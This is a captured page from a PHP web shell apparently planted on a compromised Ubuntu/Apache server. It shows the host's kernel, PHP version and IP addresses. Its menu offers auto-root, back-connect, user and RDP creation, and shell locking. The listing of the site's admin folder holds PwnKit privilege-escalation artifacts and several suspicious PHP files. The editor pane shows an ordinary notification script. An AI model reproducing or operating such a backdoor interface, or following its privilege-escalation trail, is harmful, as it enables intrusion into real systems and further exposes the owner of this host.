Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 13.59.91.59
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
website /
nublr /
admin /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-sr-x
GCONV_PATH=.
[ DIR ]
drwxr-sr-x
uploads
[ DIR ]
drwsr-sr-x
.mad-root
0
B
-rwxr-xr-x
.upload-help.php
78.43
KB
-r--r--r--
admin.js
888
B
-rwxr-xr-x
adminer.php
465.43
KB
-rwxr-xr-x
aib.php
160.7
KB
-r--r--r--
bioeve.php
100.81
KB
-rwxr-xr-x
index.js
2.53
KB
-rwxr-xr-x
login.js
778
B
-rwxr-xr-x
login_session.php
15.95
KB
-rwxr-xr-x
logout_session.php
15.86
KB
-rwxr-xr-x
mssql_connect.php
16.41
KB
-rwxr-xr-x
notif.php
16.91
KB
-rwxr-xr-x
onload.js
1.16
KB
-rwxr-xr-x
onload_notif.js
1.58
KB
-rwxr-xr-x
playererror.php
25.23
KB
-rwxr-xr-x
pwnkit
10.99
KB
-rwxr-xr-x
upload.php
16.58
KB
-rwxr-xr-x
upload_notifications.html
6.32
KB
-rwxr-xr-x
wp-post-data.php
24
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : onload.js
function load_notification() { // alert("table.HTML"); // return; $.ajax({ type: "get", url: "onload.php", success: function (response) { var response = JSON.parse(response); console.log(response); var details = response.data; var table = `<table class="table" style="width: 80%;">`; for (let i in details) { if (details[i]["FTYPE"].search("home") != -1) { table += `<tr> <td style="font-size: 16px; width:80%; "><a style="color: white;" href="admin/${details[i].FPATH}" target="_blank">${details[i].FTITLE}</a></td> <td style="color: white; font-size: 16px"><center> ${details[i].FCREATE} </center></td> </tr>`; } } table += `</table>`; console.log(table); $("#table_notif").html(table); }, }); } // <tr> // <td style="font-size: 20px; width:80%;"> // <a data-new="new" href="admission.php" target="_blank" style="color:white;"> // Admission 2021-2022 is open // </a> // // </td> // <td>05-06-2021</td> // </tr>;
Close